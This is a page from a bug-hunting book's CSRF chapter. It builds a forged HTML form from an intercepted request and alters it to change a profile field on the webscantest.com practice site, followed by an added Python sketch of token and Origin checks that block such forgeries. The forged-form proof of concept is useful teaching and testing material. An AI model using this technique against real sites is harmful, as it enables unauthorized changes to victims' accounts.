Page 111 - Hands-On Bug Hunting for Penetration Testers

CSRF and Insecure Session Authentication                                    Chapter 6

    </form>
</html>

You can see the form's enctype attribute is pulled directly from the intercepted request, and so are the method and the URL value for the action attribute. In fact, this entire snippet is simply a reverse-engineered expression of the submission in HTML. We know what HTTP request the form created; now we've written the code to produce that behavior.

This code imitates the form on the original webscantest.com page. But in the case of a real, malicious CSRF attack, the attacker probably wouldn't want to just trigger an exact duplicate of an ordinary request the user had already made. More likely, they'd alter it for their own purposes: switching financial routing numbers, changing account passwords, or altering some other piece of critical information.

In this case, the form fields might not be as ripe for exploitation, but the principle holds for more dangerous situations.

Let's still have a little fun by promoting Private Mandella to his rightful rank of major. Here's the altered code:

<html>
    <form enctype="application/x-www-form-urlencoded" method="POST"
    action="http://webscantest.com/crosstraining/aboutyou.php">
        <label>fname</label><input type="text" value="William"
    name="fname">
        <label>nick</label><input type="text" value="Major Mandella"
    name="nick">
        <label>lname</label><input type="text" value="Mandella"
    name="lname">
        <label>submit</label><input type="text" value="submit"
    name="submit">
        <input type="submit"
    value="http://webscantest.com/crosstraining/aboutyou.php">
    </form>
</html>
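As an added defensive counterpart (not code from the book or from webscantest.com), here is a Python sketch of what the server behind aboutyou.php would need in order to refuse a forged form like the one above: a per-session synchronizer token checked in constant time, plus an Origin header check. The session store, the request bodies and the attacker origin are all constructed for the example.

```python
import hmac
import secrets
from urllib.parse import parse_qs

# Constructed in-memory session store: session id -> CSRF token issued
# together with the genuine form (it would be a hidden input field).
SESSIONS = {}

SITE_ORIGIN = "http://webscantest.com"  # origin the real form is served from


def issue_token(session_id: str) -> str:
    """Mint a fresh synchronizer token for this session and remember it."""
    token = secrets.token_hex(16)
    SESSIONS[session_id] = token
    return token


def handle_aboutyou(session_id, origin, body, site=SITE_ORIGIN):
    """Validate a POST to aboutyou.php.

    Returns (accepted, reason, fields). The browser sends the victim's
    session cookie with a forged cross-site POST, so the session alone
    proves nothing; the Origin header and the token are what distinguish
    a forged submission from the real form.
    """
    fields = {k: v[0] for k, v in
              parse_qs(body, keep_blank_values=True).items()}
    expected = SESSIONS.get(session_id)
    if expected is None:
        return False, "no session", fields
    # A form hosted on another site submits with that site's Origin.
    # (If the browser omits Origin, the token check below still applies.)
    if origin is not None and origin != site:
        return False, "cross-origin", fields
    # Synchronizer token: a forged page cannot read the victim's token,
    # so it cannot include it. Compare in constant time.
    sent = fields.pop("csrf_token", "")
    if not hmac.compare_digest(sent.encode(), expected.encode()):
        return False, "bad token", fields
    return True, "ok", fields
```

Run `issue_token` once when rendering the real form and embed the result as a hidden input; the forged form above carries neither the token nor the site's Origin, so it is rejected on either check.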